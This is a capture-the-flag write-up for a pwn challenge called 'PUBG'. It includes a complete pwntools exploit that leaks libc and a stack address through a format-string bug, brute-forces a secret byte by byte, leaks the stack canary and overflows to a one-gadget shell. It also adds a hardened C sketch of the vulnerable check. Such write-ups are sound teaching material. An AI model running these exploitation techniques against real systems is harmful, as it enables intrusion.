Interesting game
PUBG
- PICK A GUN first
- AND you have two choices: gang or gou
- gou :
you may find AWM
- gang :
if you don't have an AWM you will die
- IF you win, you can leak something and then overflow to control RIP
- so enjoy the game
Entry point
- you can leak libc by the format-string bug in the airdrop check:
```c
for ( j = 0; j <= 3; ++j )
{
  if ( s[j] != buf[j] )
  {
    printf(s);
    puts(" has no airdrop");
    return __readfsqword(0x28u) ^ v4;
  }
}
```
- Luckily you can also leak j, so you can brute-force the position of the airdrop byte by byte
- so you will get the AWM
- and use the only chance to leak the canary
- then go on to control RIP
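The decompiled loop above has two defects that make the attack chain work: user data is passed as the format argument (`printf(s)`), and the comparison returns at the first mismatched index, so a caller can learn how many leading bytes matched. The following C sketch is added here and is not code from the challenge binary; it shows a fixed-format, constant-time version of that check. The function names, the 4-byte `POS_LEN` and the sample secret are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define POS_LEN 4   /* assumed: the decompiled loop compares bytes 0..3 */

/* Constant-time equality: visits every byte with no early exit, so neither
 * the return value nor the timing reveals which byte mismatched first. */
static int ct_equal(const unsigned char *a, const unsigned char *b, size_t n)
{
    unsigned char diff = 0;
    for (size_t i = 0; i < n; ++i)
        diff |= (unsigned char)(a[i] ^ b[i]);
    return diff == 0;
}

/* Hardened airdrop check (hypothetical name). Returns 1 on match, 0 otherwise.
 * The guess is copied into a fixed, zero-padded buffer, compared without a
 * mismatch-index side channel, and printed only as an argument to a fixed,
 * length-bounded format, never as the format string itself. */
int check_airdrop(const char *guess, const unsigned char secret[POS_LEN])
{
    unsigned char g[POS_LEN] = {0};
    strncpy((char *)g, guess, POS_LEN);  /* at most POS_LEN bytes, zero padded */

    if (ct_equal(g, secret, POS_LEN))
        return 1;

    /* "%p%p" in the guess is printed literally, not interpreted */
    printf("%.*s has no airdrop\n", POS_LEN, guess);
    return 0;
}

int main(void)
{
    const unsigned char secret[POS_LEN] = { 'A', 'W', 'M', '!' };  /* constructed */
    check_airdrop("%p%p%p%p", secret);   /* prints the specifiers verbatim */
    return check_airdrop("AWM!", secret) ? 0 : 1;
}
```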
EXP
```python
# Python 2 pwntools script; escape sequences restored from the extracted text.
from pwn import *

def cmd(c):
    p.readuntil("> ")
    p.sendline(str(c))

def airdrop(c):
    cmd(2)
    p.readuntil("position:")
    p.send(c)

p=process("./pubg")
p=remote("127.0.0.1",1025)
cmd(1)
cmd(1)
# leak libc through the format-string bug
airdrop("%p%p%p%p\n")
p.readuntil("0x25")
base=int(p.readline(),16)-0x5cd700+0x7fd980588000-0x7fd98058d000
log.warning("Libc:%s",hex(base))
# leak a stack address
airdrop("%a%a%a%a%a")
p.readuntil("ap-10220x0.0")
stack=int("0x"+p.read(11)+"0",16)
log.info("stack:%s",hex(stack))

# recover the airdrop position byte by byte using the leaked j
res=""
for x in range(3):
    for y in range(1,256):
        if (chr(y)!='\n' and chr(y)!='$' and chr(y)!='*' and chr(y)!='|'):
            airdrop(res+"{}%p|%p\n".format(chr(y).ljust(3-x,'\x01')))
            p.readuntil("|")
            data=p.readline()
            if data=="(nil)\n":
                data=0
            else :
                data=int(data,16)
            if (data==x+1):
                res+=chr(y)
                break
            else:
                continue
airdrop(res)
cmd(1)
p.readuntil("chicken:\n")
# leak the canary
canary_add=(0x7ffe2c5822c8-0x7ffe2c5823d0)+stack
p.sendline(str(canary_add+1))
sleep(0.1)
p.readuntil("The ")
data="\x00"+p.read(7)
canary=u64(data.ljust(8,'\x00'))
log.info("Canary:%s",hex(canary))
p.readuntil("~\n")
# overflow to control RIP
off=0x20
one=base+0x45216
p.send("\x00"*off+p64(canary)*3+p64(one)+"\n")
p.interactive()
```
review
It is an interesting game.
There are lots of little tricks in this challenge.